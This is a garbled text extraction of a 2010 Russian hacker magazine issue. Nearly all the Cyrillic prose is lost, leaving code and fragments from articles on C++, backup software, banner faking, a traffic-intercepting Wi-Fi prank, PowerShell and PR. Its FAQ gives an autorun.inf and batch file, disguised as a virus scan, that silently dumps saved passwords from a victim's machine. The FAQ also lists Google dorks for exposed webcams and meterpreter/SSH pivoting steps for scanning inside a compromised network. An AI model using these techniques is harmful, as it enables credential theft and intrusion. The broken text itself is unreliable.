Penguin p;
p.fly();
// !
fly() ,
. , .
, ( ) ,
.
.
,
, , ,
. C++
- , .
X 05 /136/ 10
Derived d;
int x;
d.mf1();
// , Derived::mf1
d.mf1(x);
// ! Derived::mf1 Base::mf1
d.mf2();
// , Base::mf2
111
CODING
d.mf3();
// , Derived::mf3
d.mf3(x);
// ! Derived::mf3
Base::mf3
, mf3,
, , .
C++-.

, mf1 mf3
.
, Base::mf1 Base::mf3
Derived. ,
, , .
, ,
. ,

. using:
using-
class Base {
private:
int x;
public:
virtual void mf1() = 0;
virtual void mf1(int);
virtual void mf2();
void mf3();
void mf3(double);
};
class Derived: public Base {
public:
// ()
// mf1 mf3 Base Derived
using Base::mf1;
using Base::mf3;
virtual void mf1()
void mf3();
void mf4();
};
Derived d;
int x;
d.mf1();
d.mf1(x);
// , Derived::mf1
// , Base::mf1
d.mf2();
// , Base::mf2
d.mf3();
d.mf3(x);
// , Derived::mf3
// , Base::mf3
, . ,

112
,
using- , .
:
.

.
, ,
, ,
( , ) .
,
.
.

class Shape {
public:
virtual void draw() const = 0;
virtual void error();
int objectID() const;
};
class Rectangle: public Shape {};
class Ellipse: public Shape {};
, : ,
. .
,
, ,
.
, .
draw() . ,

.
Shape
draw
.
, ,
,
:
, .
.
error(), .
,
, .

, .
Shape .
(Triangle).

-. - ,
,
.
Triangle
class Shape {
public:
...
X 05 /136/ 10
...
};
class Triangle: public Shape {
// ,
};
Shape *tr = new Triangle;
// Shape::error(),
tr->error();
, -
,
.
.
, error ,
-.
:

class Shape {
public:
protected:
void defaultError();
};
void Shape::defaultError()
{
// ,
}
class Rectangle: public Shape {
public:
virtual void error() {defaultError();}
};
class Ellipse: public Shape {
public:
virtual void error() {defaultError();}
};
public:
};
void Triangle::error()
{
// ,
Triangle
}

, , .
, ,
. .
X 05 /136/ 10
C++ ,
,
.
. 2
class Shape {
public:
virtual void error() = 0;
};
//
void Shape::error()
{
// ,
}
class Rectangle: public Shape {
public:
virtual void error() {Shape::error();}
...
};
class Ellipse: public Shape {
public:
virtual void error() {Shape::error();}
...
};
public:
...
};
void Triangle::error()
{
// ,
Triangle
}
, -
error,
. ,
, , error defaultError,
.
, objectID().
, , .
Shape ,
, Shape::objectID,
.
,
, , : ,
.
C++. , ,
,
- C++,
, . z
113
SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru

. , ,
:
(, , Windows), , , .
, .
BACULA
: Bacula
: bacula.org, sf.net/projects/
bacula
: Bacula
Project 5. Bacula System
Enterprise 4.
: GNU GPL
: Linux, FreeBSD, Open/Solaris
: Linux, *BSD, Open/Solaris, Mac
OS X, Win

, .
- ,
Bacula
,
, .
.

,
. ,

(, , ). Bacula ,
,
.
114

, .

,
.
.
,
Bacula, ,
, /
:
Director ( 9101) ,
Bacula, ,
;
Storage ( 9103) ,

( , CD/DVD,
USB );
File Daemon ( 9102) ,
Director'
Storage.
, Direct, Storage, File Daemon
Bacula
Monitor
( ) .
PostgreSQL, MySQL
SQLite. Director Storage

Linux,
FreeBSD, Open/Solaris. ,
, Windows
(32 64 bit), *BSD, Mac OS X. , Bacula
.
,
SSH ,
.
.
bconsole, BAT (Bacula Admin Tool) Qt ( Ubuntu universe) wx-console
wxWidgets. (baculagui) : bweb (- Perl
), bacula-web
(-, PHP), bimagemgr
(- CD ). ,
, Baculaconf
(baculaconf.sf.net) Webacula (Web + Bacula,
webacula.sf.net/ru).
, -,
(, ..),
,
.
Bacula
( CRAM-MD5), X 05 /136/ 10
TLS .
iptables 192.168.1.0/24 :
:
-A INPUT -p tcp --dport 9101:9103 s 192.168.1.0/24 -j
ACCEPT
9102 :
-A INPUT -p tcp --dport 9102 s 192.168.1.0/24 -j ACCEPT
, Bacula, Bran (branbackup.org,

ALT Linux),
. -.
BACKUPPC
: BackupPC
: backuppc.sf.net
: GNU GPL
: Linux, *BSD, Open/Solaris
:
BackupPC . Bacula, ,
.
, .
Unix- Linux, *BSD, Open/Solaris. Unix/Linux, Mac
OS X Windows . Windows SMB,
X 05 /136/ 10
rsync ( cygwin), Unix-

rsync, nfs tar.
BackupPC ,
:
SMB, , ,
,
rsync. (gzip/bzip2),
. , .
SSH .
, IP-.
, , .
.
,
. ,
IP,
.
BackupPC ,
.
, .
. , .
. ,
AMANDA.
config.pl (
, ).

115
SYN/ACK
Boxi
- Bacula Webacula
( /ServerBackupPC/
pc/computer_name).

hosts.
, ,
, ,
- (CGI),
-.
,

. -
, .
BackupPC Perl,
:
Compress::Zlib, Archive::Zip File::RsyncP.
, Samba
Apache.
3.1.0
( 2007 ), 3.2.0beta0 ( 2009),
.
BOX BACKUP
: Box Backup
: boxbackup.org
: BSD
OS X
OS X, WinXP/2k3/Vista
Box
Backup ,
. ,
,

, , CD/DVD .

.
,

. ,
.
(snapshot),

(rsync).
, Box Backup , ,
.
, - (
)
. , Box Backup
vs
,
. .
.
.
, ,
, ( ).
.
116
.
, .

, . ,
MP3 ,
:
ExcludeFilesRegex = .*\.(mp3|MP3)$
Box Backup -
: bbstored, ,
bbackupd,

, bbackupquery,

. ,
, ,

,
.

OpenBSD Linux, Box Backup
Free/NetBSD, Mac OS X, Solaris.
, ,
Windows.
Box Backup
.
TLS/
SSL . , bbstored-certs,
.

AES, Blowfish,
, , .
, (
, ) .
,
,
, .
,

X 05 /136/ 10
- BackupPC
. Boxi (boxi.sf.net),

wxWidgets.
.

Windows. - Boxbackup-Explorer (joonis.de/boxbackup-explorer),

.
0.10 (
2006 ), . : 2 .
, 0.11rc5 ( 2009),
,
.
AMANDA
: AMANDA
: amanda.org, sf.net/projects/amanda
: Freeware
: Linux, *BSD, Open/Solaris, Mac OS X
: Linux, *BSD, Open/Solaris, Mac OS X,
WinXPSP2/2k3SP2/VistaSP1/2k8R2/7
AMANDA (Advanced Maryland Automatic Network Disk
Archiver) ,
Maryland
().
Sourceforge, freeware
, , ,
.
AMANDA
, *nix- .
, AMANDA
dump/restore ( XFS xfsdump), GNU tar,
compress, gzip ,
.
AMANDA , CD/
DVD -.
, ,
.
AMANDA dump tar.
ext2/3, ZFS XFS ,
,
X 05 /136/ 10
BackupPC Web-
CGI,
INFO
tar, ,

.
AMANDA - .
,
,
, .
, Windows SMB.
Zmanda Windows Client 2.6.x (wiki.
zmanda.com/index.php/Zmanda_Windows_Client), Win32 API
Volume Shadow Services
( VSS ][ 2008
).
: WinXPSP2/2k3SP2/VistaSP1/2k8R2 Se7en.
- (cs.ait.ac.th/laboratory/amanda),
Windows
.

,
UDP TCP.
:
Kerberos 4/5, OpenSSH, rsh, bsdtcp, bsdudp Samba. , Windows
bsdtcp.
"-auth=bsdtcp". , inetd:
amanda stream tcp nowait amanda /usr/lib/
amanda/amandad amandad -auth=bsdtcp amdump
, disklist, , ,
:
auth "bsdtcp"
, .
10080/UDP 10081/
TCP, Kerberos.
.
info
VSS
,
][
03.2008.
HTTP://WWW
links
Bacula
bacula.org, sf.net/
projects/bacula

Webacula webacula.
sf.net/ru

BackupPC
backuppc.sf.net

BoxBackup
boxbackup.org
Boxi
boxi.sf.net

AMANDA amanda.
org, sf.net/projects/
amanda
Zmanda
Windows Client
wiki.zmanda.com/
index.php/Zmanda_
Windows_Client
117
SYN/ACK
Bacula - BAT
AMANDA . , ,

.
GPG, , , , (amcrypt, GPG
..) .
:
Bacula Ubuntu
kencrypt yes
, .
,
.
cron .
,
. , . ,
AMANDA
. , ,
. Amanda Enterprise Edition
GUI (Zmanda Management Console),
.
118
AMANDA ,
amrecover, , , ,
: ,
, , . ,
.
,
,
. ,
,
.
, ,
.z
X 05 /136/ 10
8.5
DVD
!
660 . !
? ?
.
.
( )

.
2100 .

72 000 QIWI ()
.
?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru
1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

SYN/ACK
j1m@synack.ru

, ,
, , , ,
,
, ,
.

:
1. .
-,
,
.
,

, .
2. -.
,

. ,
.
, , . :
, ,
.
3. .

. , -,
,
, ,

( ).
,

,
.
120

, , ,

.
.
, ,
,
.
,
, , : ftpd, smtpd
httpd, dns. ,

, ProFTPd, ,
, vsftpd,

:
ProFTPd. /etc/proftpd.conf "Welcome to Micro-FTPd
0.23 (OS/2 3.3)" ServerName.
vsftpd. /etc/
vsftpd/vsftpd.conf
: "ftpd_
banner=Welcome to OnixFTPD (version:
22.1, OS: 386BSD 4.3)".
LigHTTPd. /etc/
lighttpd.conf
server.tag "MicrosoftIIS/3.3.3.3.3".
Sendmail. /etc/
mail/sendmail.mc
:
define(`confSMTP_LOGIN_MSG,
èxchange.srv.local Microsoft MAIL
Service, Version: 6.0.3790.1830
ready)dnl
:
# cd /etc/mail
# m4 sendmail.mc > sendmail.cf
* Postfix. /etc/postfix/
main.cf, smtpf_banner
"VAX
HTTPD 3.31-beta (MS-DOS 5.3, gcc
1.1)"
* Bind. /etc/bind/named.conf,
:
options {
version "8.2.2";
};
: BIND 8.2.2
, ,

DNS-, DoS-
root.
.

, ,
Apache
X 05 /136/ 10
include/ap_release.h (
#define AP_SERVER_BASEPRODUCT "Apache").
, , .
honeypot-, .
smtp-, , :
$ vi fake-smtpd.pl
#!/usr/bin/perl
use Socket;
$port=25;
$hostname="host.com";
$banner="220 host.com ESMTP Sendmail 8.6.1/8.5.0\n\r";
$fail="500 Command unrecognized:";
[ skipped ]
($af,$port,$inetaddr)=unpack($sockaddr,$addr);
@inetaddr=unpack('C4',$inetaddr);
($i1,$i2,$i3,$i4)=@inetaddr;
$ipaddr="$i1.$i2.$i3.$i4";
print "connected from $ipaddr\n";
print NS $banner;
while(<NS>) {
if (/EHLO/i) {
print NS "Hello $ipaddr. nice to meet you\n\r";
} else {
print NS "$fail $_\r";
print "tried $_";
}
}
print "$ipaddr disconnected\n";
}
X 05 /136/ 10
, ,
, . ,
, .
, ,

-? ,
.
( HTTPd),
,
. Nmap : ,
,
(TCP UDP, ..) , .
, , :
# iptables -P INPUT DROP
# iptables -A PREROUTING -t nat -p tcp ! --dport 80 \
-j REDIRECT --to-port 80
# iptables -A INPUT -p tcp --syn --dport 80 \
-m connlimit ! --connlimit-above 10 -j ACCEPT
, 80, 80- . 10. , web-

DoS.
web- -
. ,
slashdot- ( - ),
, web-.

121
SYN/ACK
SMTP- SMTP
Apache
( ), .
,
.
.htaccess
:
RewriteEngine on
RewriteCond %{HTTP_REFERER}
^http://www\.evil\.net [NC]
RewriteRule .* http://www.google.
com [R]

HTTP_REFERER
,
www.evil.net ([NC]
no case: URL
).
,
,
( google.com,
).
, .
Wi-Fi
,

, Wi-Fi ,
.
: ,
/
, - . ,
, ,
.
www.ex-parrot.com/pete/
upside-down-ternet.html,

122
. : ,
,

, .
, .
DHCP-,
.
,
.
dhcpd.
conf:
# vi /etc/dhcpd.conf
###
ddns-updates off;
ddns-update-style interim;
authoritative;
shared-network local {
### ""
subnet *.*.*.* netmask
255.255.255.0 {
range *.*.*.* *.*.*.*;
option routers *.*.*.*;
option subnet-mask
255.255.255.0;
option domain-name "mydomain.
ru";
option domain-name-servers
*.*.*.*;
deny unknown-clients;
###
host client1 {
### MAC-
IP-
hardware ethernet
*:*:*:*:*:*;
fixed-address *.*.*.*;
}
}
### , , , ,
### -
subnet 192.168.0.0 netmask
255.255.255.0 {
range 192.168.0.2
192.168.0.10;
option routers 192.168.0.1;
option subnet-mask
255.255.255.0;
option domain-name-servers
192.168.0.1;
allow unknown-clients;
}
}
dhcpd:
$ sudo service dhcpd restart
squid,
HTTP-,
:
$ sudo apt-get install squid
/etc/
squid/squid.conf ( ):
# vi /etc/squid/squid.conf
###

acl localnet src 192.168.0.0/24
http_access allow localnet
###
http_port 3128 transparent
###
url_rewrite_program /usr/local/bin/
flip.pl
flip.pl, :
# vi /usr/local/bin/flip.pl
#!/usr/bin/perl
$|=1;
$count = 0;
X 05 /136/ 10
flip.pl
xakep.ru -, , google.com

):
$pid = $$;
while (<>) {
chomp $_;
if ($_ =~ /(.*\.jpg)/i) {
$url = $1;
system("/usr/bin/wget", "-q", "-O","/
var/www/images/$pid-$count.jpg", "$url");
system("/usr/bin/mogrify", "-flip","/
var/www/images/$pid-$count.jpg");
print "http://127.0.0.1/images/$pid-$count.jpg\n";
}
elsif ($_ =~ /(.*\.gif)/i) {
$url = $1;
system("/usr/bin/wget", "-q", "-O","/
var/www/images/$pid-$count.gif", "$url");
system("/usr/bin/mogrify", "-flip","/
var/www/images/$pid-$count.gif");
print "http://127.0.0.1/images/$pid$count.gif\n";
}
else {
print "$_\n";;
}
$count++;
}
:
$ sudo chmod +x /usr/local/bin/flip.pl
squid :
$ sudo service squid reload
-, , :
$ sudo usermod -aG proxy www-data
INFO
-:
$ sudo service apache2 restart
, iptables:
$ sudo iptables -t nat -A POSTROUTING \
-j MASQUERADE
$ sudo iptables -t nat -A PREROUTING -p tcp \
--dport 80 -j REDIRECT --to-port 3128
. HTTP-,
, squid
, , -,
/var/www/images
-. ,
- -.

. ,
.
, .
Postfix, ,
,
,
. filter,
:
info

,

bash

.

!
(][_11_2009),

.
DVD
dvd

fake-smtpd.pl
flip.pl.
$ sudo adduser filter

$ sudo apt-get install apache2
:
$ sudo mkdir /var/www/images
$ sudo chown www-data:www-data /var/www/images
$ sudo chmod 755 /var/www/images
- ,
www-data proxy (
X 05 /136/ 10
, :
$ sudo mkdir /var/spool/filter
$ sudo chown filter:filter /var/spool/filter
.
/etc/
postfix/master.cf.
123
SYN/ACK
BIND
filter unix - n n - 10 pipe flags=Rq user=filter argv=/

usr/local/bin/mail-filter.sh
$ sudo chmod +x /usr/local/bin/mail-filter.sh
:
mail-filter.sh :
$ sudo service postfix reload
# vi /usr/local/bin/mail-filter.sh
#!/bin/sh
###
INSPECT_DIR=/var/spool/filter
SENDMAIL="/usr/sbin/sendmail -i"
###
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
###
trap "rm -f in.$$" 0 1 2 3 15
###
cd $INSPECT_DIR || exit $EX_TEMPFAIL;
###
cat > in.$$ || exit $EX_TEMPFAIL;
###
echo "---\n ..." > in.$$
### sendmail'
$SENDMAIL "$@" < in.$$
exit $?
124
smtpd
pipe (
). echo
( ...)
sendmail. (postfix - postfix).
,
IP- DNS-,
,
- www.bibigon.com.
google.com,
html-, -
80-
-, google.
com .
Samba CUPS,
, .
, , .
, . ,
. z
X 05 /136/ 10
SYN/ACK
Nathan Binkert nat@synack.ru

CyberBook S855:
DESTEN
> :
Intel
965GM
Intel
ICH8M
> :
2 SODIMM
DDR2
800/667 SDRAM
4
> :
2.5" SATA HDD,
80-320
> :
15.4" WXGA (1280x800)
>> SYN/ACK

CyberBook S855
> :
Intel Graphics Media Accelerator GMA X3100
( 358 )
> ( ):
Intel Core 2 Duo 2.1-2.8 FSB 800 , 3-6

Intel Celeron M 1.73-2.26 FSB 533 , 1

> :
56K V.90 -
10/100/1000 /
Intel Pro
Wireless 4965AGN (802.11a/g)
Bluetooth 2.0, 3G ()
.
, , , , , , ,
. .
DESTEN CyberBook,

, . , , , , ,
.
S855 .
,
, .
,
.
,
- . , ,
.
,
, . .
CyberBook -
126
> :
- 6-
4400 / ( 3 )
- 9-
6600 / ( 4 )
> -:
3 USB 2.0
1 IEEE 1394 (4-pin)
1 Express Card 34/54
1 VGA (15-pin D-sub)
1
1
1 RJ-11 (56 Kbps V.90)
1 RJ-45 Ethernet
1 COM port (9-pin D-sub)
> :
- 4 1 (SD, MMC, MS, MS Pro)
- 1.3
88
Intel HD Audio

DVD+-RW (
)
> :
370 x 276 x 37,5~40
: 3
MIL-STD 810F.
MIL-STD-810F, 516.5,
IV. MIL-STD-810F 514.5, I.
,
IT- .
Intel Core 2 Duo,
4 ,
320 . : Ethernet-, v.92,
Wi-Fi 3G-.
40286 .
X 05 /136/ 10
ipc2U iROBO-1000-10A2:
Intel Atom

ipc2U iROBO-1000-10A2
> :
Mini-iTX
> :
Intel Atom 1.6
> :
Intel 945GSE
> :
DDR2 SODIMM
512
2 DDR2 533
> :
2 SATA-
1 160 SATA
2 RS-232
6 USB 2.0
1 CompactFlash
> :
VGA ( DVI, VGA)
Slim DVD-RW
> :

> :
( 1U)
(xx): 483 x 43 x 220
5.5

> :
2 Gigabit Ethernet-
> :
180
>> SYN/ACK
> :
1 PCI
-:
2 PS/2
iROBO-1000-10A2 ipc2U .
,

. Intel Atom.
iROBO Intel,
,
. -,
Intel Atom SCH
, ,
( 2.5 ),
. -,
,
X 05 /136/ 10
, , 220 ,

. -, Intel Atom , , .
, Intel Atom

. , 1.6 Intel Atom
800 Intel
Xeon, .

SATA-, 2 1.5 ( ,
DVD-
ROM). ,
, , -, .

,
, USB
.
, PCI.
-
Windows (Vista, XP Pro),
. iROBO-1000-10A2
RoHS.
512 160 700$.
127
SYN/ACK
grinder grinder@synack.ru
POWERSHELL 2.0
PowerShell , ,
, . : , .
, PS ,
, .

,
, .
,
. , "System.
OutOfMemoryException".

, ,
, .

. ,
, .

:
PS> Get-Process | Where ($_.
ProcessName -eq "explorer")
PS> Get-Process explorer
, .

.
,
PowerShell. ,
.
ForEach-Object ( foreach) -
128
foreach (
). ,

,
.
PS> $computers = Get-ADComputer
PS> foreach ($computer in
$computers) { - }

:
PS> Get-ADComputer | ForEach-Object
{ - }

, .
(pipelines, "|")
ForEach-Object

,
, . , .
ActiveDirectory
:
PS> import-module ActiveDirectory
,
:
PS> foreach ($computer in GetADComputer) { $computer }

,
( ) .

,
. . , foreach ,
PS
, foreach
.
, foreach ,
, , ,
. , -,
. ,
( ,
Get-Process, , ),
. PS
: .
TeeObject. , ,
:
PS> Get-Process | Tee-Object
-filepath C:\process.txt
,
.

:
X 05 /136/ 10
PS> Get-Process | Tee-Object -filepath C:\process.txt |

Sort-Object cpu
, Out-File:
PS> Get-Process | Tee-Object -filepath C:\process.txt |
Sort-Object cpu | Out-File C:\process-sort.txt
Tee-Object ,
"-inputObject".

GetContent, Select-String, . ,
, . ,
Get-Content ,
( ). ,
100 :
Get-Content , . , Select-String
, .
, PS
PowerShell:
PS> Select-String -path *.ps1 -pattern "PowerShell"
, , :
PS> Get-Content -path *.ps1 | where {$_ -match
"PowerShell"}

where, ,
. , , .
, , , (Warning, Failed ..), Success.
Select-String "notMatch"
, :
PS> Get-Content :\system.log -Read 100

PS> Select-String "Success" *.log notMatch
,
.
Read, , "| ForEach-Object
($_) |", .
, :
PS> Get-Content biglogfile.log -read 1000 | ForEachObject {$_} | Where {$_ -like '*x*'}
3 , :
PS> Get-Content biglogfile.log | Where {$_ -like '*x*'}
X 05 /136/ 10
, "context",
. ,
Failed:
PS> Select-String "Failed" *.log -content 2
, Select-String
, "-caseSensitive".
,
129
SYN/ACK
PS
,
PS ServerMnager

: , .
PS , .
Write-Host, : (-Backgroundcolor) (-Foregroundcolor).
PS> Get-Process | Write-Host -foregroundcolor DarkGreen -backgroundcolor white
. , Write-Host .
, Error,
.
PS> if ($a = "Error"){Write-Host $a -foregroundcolor red}
> else
> {Write-Host $a}
>}
, , " ": Write-Warning Write-Error.
PS> Write-Error "Access denied"
,
, , Out-Host
"-paging" :
PS> Get-Process | Out-Host -paging
: Clear-Host ( ), WriteProgress ( ), Sort-Object ( ).
PS> Get-Process | Sort-Object cpu
, CPU, .
"-Descending".
130
Microsoft, SelectString
grep/egrep. , grep
Windows :
GnuWin32 (gnuwin32.sf.net), Windows grep
(wingrep.com), GNU Grep For Windows (steve.
org.uk/Software/grep), Grep For
Windows (grepforwindows.com, pages.interlog.
com/~tcharron/grep.html) .
grep Select-String.
> grep Warning *.log

,
, .Net.
, grep. ,
Windows findstr.exe, ,
, grep .

. PS
, ,
-,
( GetType().
FullName), . ,
.

. ,

,
. ,
,
,
:
PS> $arr = New-Object string[] 300
:
PS> $arr.GetType().Basetype
:
X 05 /136/ 10
INFO
info
Get
EvenLog
$arr = new-object int[] 1000
for ($i=0; $i lt 1000; $i++)
{$arr[$i] = $i*2}
10 , :
$arr = @()
for ($i=0; $i lt 1000; $i++)
{$arr += $i*2}

PS Perl-
,
. , PS

. PS
*-Eventlog ,
, .
. ,

, "Nevest"
:
,
.NET Framework ( System.Text.
RegularExpressions.Regex). "-match" "cmatch"
(case-sensitive, ) "-imatch" (case
insensitive, ). ,
IP-,
ipconfig. :
PS> ipconfig | where {$_ -match "\d{3,}"}
PS
,
*, ?, +, \w, \s, \d .
:
Windows
PS v2.0 CTP3 Get-WinEvent,

.
, :
PS> Get-WinEvent -ListProvider *update*
Microsoft-Windows-WindowsUpdateClient {System,
Operational}
localhost, synack.ru
, :

PowerShell
][_03_2010.

(
<Tab>),
.
PS> $regex = "^[a-z]+\.[a-z]+@synack.ru$"

> If ($email notmatch $regex) {
Microsoft-Windows-WindowsUpdateClient/
PS> Get-Eventlog Security -Nevest 20 -computername

PowerShell
PowerShell

2009 .
, ,
Windows Update.
:
PS> Get-Eventlog Security -Message "*failed*"
HTTP://WWW
links

, PowerShell
microsoft.com/
powershell, blogs.
msdn.com/PowerShell

powershellcommunity.
org, pwrshell.net,
powershelltools.com,
powershell.wik.is.
Unix
Windows
gnuwin32.sf.net
PS> $provider = Get-WinEvent -ListProvider
(
EventID=4624):
PS> Get-Eventlog Security | Where-Object {$_.
EventID -eq 4624}
X 05 /136/ 10
Microsoft-Windows-WindowsUpdateClient
PS> $provider.events | ? {$_.description -match
"success"} | select id,description | ft -AutoSize

Perl.
www.xakep.ru/
post/19474
131
SYN/ACK

, "Warning",
"!!!Warning":
PS> Get-Content -path system.log | foreach {$_ -replace
"Warning", "!!!Warning"}
,
. Perl,
,
. $0 , $1 , $2 .
:
PS> Get-Content -path system.log | foreach {$_ -replace
"(Warning)", "!!!$0"}
Where PowerShell
> Write-Error "Invalid e-mail address $email"
>}
, synack.ru
( ), ( Write-Error - ).
,
, (. Perl www.xakep.ru/post/19474). ,
,
.
, RegexBuddy (regexbuddy.com/powershell.html)
RegexMagic (regexmagic.com). , PS
, -replace (
-ireplace -creplace).
:
-replace "_","_"
132
-
, , . Microsoft
, PS Measure-Command,
.
PS CMD, COM, WMI .NET,
. .
:
PS> Measure-Command {ServerManagerCmd -query}
TotalMilliseconds: 7912,7428
PS> Measure-Command {Get-WindowsFeature}
TotalMilliseconds: 1248,9875
, PS
.
PowerShell ,
, .
. ,
. z
X 05 /136/ 10
UNITS
Oriyana oriyana@xaker.ru
PSYCHO:
PR-

,
. , , , . ,
, . , ,
. , .
, ,

. , , ,
,
, PR-.
PR
. ,
, ,
,
, , , ,
, PR?
Public Relations ( )
, ,

. :
, , .
,
, ,
.
PR-. , ,
134

,
.

, . : ,
,
,
.

, ,
, .
,
,
, .
PR- ,
, .
.
: ,
. ,
, .
,
,
.

.
:
, ,
,
.
.
: , ,
, .

. .
.
, .
-
. ? :

, .
:
, X 05 /136/ 10
. ?
. ,
- ,

Boss
,
, , - .
-.
,
.

,
,
, .
: - ,
,
, ,
, . , , ,
, ,
.
:
.

, .

.
X 05 /136/ 10
,
,
.
: !
18:00! 30%!.
,
.
,
PR
:
, ,
, ,
.
.
, :
- ,

. , ., , , 5:43

.
. ,
,
. :
( ,
)
, .

,

. ,
,
. , ,
, ,
.

. ,
,

. , ,
.
, ,
,

.
135
UNITS
Pepsi

-.
,

, ,

. .
, ,
,
.
, ? :)
:
, .
, ,
. ,
, ,
.
. ,

.
: ,

, ,
,
. ,

, ,
136
,
, .

: , ()
(
). : , ,
. (
). ? ,

( , )? ( ,
).
,
,
. ,
, . ,
. .
:
.
, . , ,
, .
: ,
.
: . ,
, .
.
.
-
, , .
, ,
,
. , 2-3

( ) .
, .
.
,
.
: , ,
,
. , , , 70% (
,
), 30% . ,
, ,
.
: , ,
.
,
.
, ,
, .
:
.
,
:

.
:
, : , ,
,
.
,
:
,
.
, . ,

,
X 05 /136/ 10
: -
,
, .
,
.

.
H1N1
. .
?
.
.
: , , .
,

.
.

. ,
,

.
:

,
(, , ). -

: ( ). ( , , ,
, ) (,
, , , ) ,
,
.
, , , ,
,
, ,
.
, ,
, ( );
, (
,
,
);
, , , , ,
, ,

: ,
,
,

. , ,

.
.
, , , .
,
.
,
: X 05 /136/ 10
, , ,
,
.
:
. , , .
,
,
,

(
). , -

-,
.

(
, , ,
).
,
,
.
.

. : ,

, ,

137
UNITS
.
: ,

, . ,
?
()
, , .
(,
..)
,
. , ,
, ;
(, , ) (,
, ).
( , ). ,
,
.

. , : ,
, (
). ,
.
, : ,
,

( ).

.
.
2004

,
.
,
.
,
, ,
.
, .
, ,
.
138
X 05 /136/ 10
:
,
, , .
.
.
.
, , . odnoklassniki.ru vkontakte.
ru.

.
,
, .
. ,

. , , ,
-,
, -,
VPN .
, .
, :
, ,
,
, , .
.
PR

PR-
PR-

, PR-
.

.
,
,
.
. 2004 .
.
, .
X 05 /136/ 10
,
?
,
(
).
?
, ?
,
, , .

.
,
,
.
.
,
, ,
. .
:
( , );
,
, , (
, , );
, , , -
(,
);
, ,
;

;
, ,
.
, , ,
PSYCHO! :)z
139
UNITS
antitster@gmail.com
faq
united
@real.xakep.ru
Q: , .
- , . ?
A: .

, .
, ,
,
.

:
MessenPass (www.nirsoft.net/utils/mspass.
html)
: MSN Messenger,
Windows Messenger, Yahoo Messenger, ICQ,
Trillian, Miranda GAIM;
Mail PassView (www.nirsoft.net/utils/mailpv.
html)
: Outlook Express, Microsoft
Outlook 2000, Microsoft Outlook 2002/2003,
IncrediMail, Eudora, Netscape Mail, Mozilla
Thunderbird;
140
IE Passview (www.nirsoft.net/utils/internet_
explorer_password.html)
, Internet
Explorer-;
Protected Storage PassView (www.nirsoft.net/
utils/pspv.html) , ;
PasswordFox (www.nirsoft.net/utils/
passwordfox.html) ,
Firefox'.
,
, .
autorun.inf :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
launch.bat:
start
start
start
start
mspass.exe /stext mspass.txt

mailpv.exe /stext mailpv.txt
iepv.exe /stext iepv.txt
pspv.exe /stext pspv.txt
start passwordfox.exe /stext

passwordfox.txt

popup "ACTION= Perform a Virus Scan",

,
.
Q: -,
?
A: Googlehack
! (www.xakep.ru/magazine/
xa/076/056/1.asp)
:
inurl:"CgiStart?page="
inurl:/view.shtml
intitle:"Live View / AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
X 05 /136/ 10
(disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera
NetworkCamera" (disconnected)
intitle:axis intitle:"video
server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.
html"
intitle:"Live NetSnap Cam-Server
feed"
intitle:"Live View / AXIS"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motio
n" (disconnected)
intitle:start inurl:cgistart
intitle:"sony network camera
site:.viewnetcam.com -www.
viewnetcam.com
intitle:"Toshiba Network Camera"
user login
intitle:"netcam live image"
(disconnected)
intitle:"i-Catcher Console Web
Monitor"
Q: -
1. meterpreter OpenSSH . ,
: packetheader.
blogspot.com/2009/01/installing-openssh-onwindows-via.html.
2. OpenSSH
Meterpreter,
8000
22
:
meterpreter> portfwd add -L
172.16.186.132 -l 8000 -r
172.16.186.128 -p 22
3. SSH-
(172.16.186.132):
# ssh -D 127.0.0.1:9000 -p 8000
username@172.16.186.132
SOCKS4-
9000 ,
SSH-.
4. PROXYCHAINS ,
nessusd SOCKS4-, 9000 (
proxychains.conf
,
):
?
A:
,
,
,
,
. ,
- ,
,
.

,
GhostBuster (ghostbuster.
codeplex.com). !
Q: .
,
(
HTTP/HTTPS-).
(172.16.186.132). meterpreter- (172.16.186.126)
(, ). - Nessus
meterpreter-?
# proxychains /usr/sbin/nessusd -D
5. Nessus- .
Q: ,
Wireshark . -
?
A: , Wireshark- ,

.
.
Wireshark Tshark.

(
tshark -h).
?

. tshark
-D.
:
A: , -
, . (
,
,
):
X 05 /136/ 10
1. \Device\NPF_{11A468B6-C06545F6-AB32-D69695A6F601} (MS Tunnel

Interface Driver)
2. \Device\NPF_{A16900A3-020C4B05-B430-4CD67527C189} (Realtek
RTL8168B/8111B PCI-E Gigabit

Ethernet NIC)
:
tshark -i 2 -wexample.pcap -f "tcp[13] = 0x14",
-i ;
-w , ;
-f , libpcap ( ,
tcp 13- 0x14, RST ACK).
www.
cs.ucr.edu/~marios/ethereal-tcpdump.pdf
www.tcpdump.org/tcpdump_man.html.
, <Ctrl-C>.
example.pcap Wireshark
, , .
Q: ,

, ,
?
A: ,
,
IDA:
BinfDiff (www.zynamics.com/bindiff.html)
TurboDiff (corelabs.coresecurity.com/index.p
hp?module=Wiki&action=view&type=tool&nam
e=turbodiff)
: , . (*.idb ),
Edit Plugins Turbodiff/Bindiff
compare with,

. ,
.
Q: XSS/CSRF,
JavaScript-. ,
?
A: , , XSS, Javascript
Firefox
+ Firebug + Eventbug.
, Eventbug, ,
. ,
Firebug',
( ,
Firefox - :)).
, :

.
Firebug
Events. ,
141
UNITS
- , ,
. Eventbug
Firefox 3.6 Firebug 1.5 .
Eventbug -,
getfirebug.com/
releases/eventbug/1.5/eventbug-0.1b4.xpi.
Q: , Linux traceroute
. - ?
A: :).
Fakeroute
(www.thoughtcrime.org/software/fakeroute).
,
. ,
:
traceroute to yyyy (63.199.yy.yyy),

30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
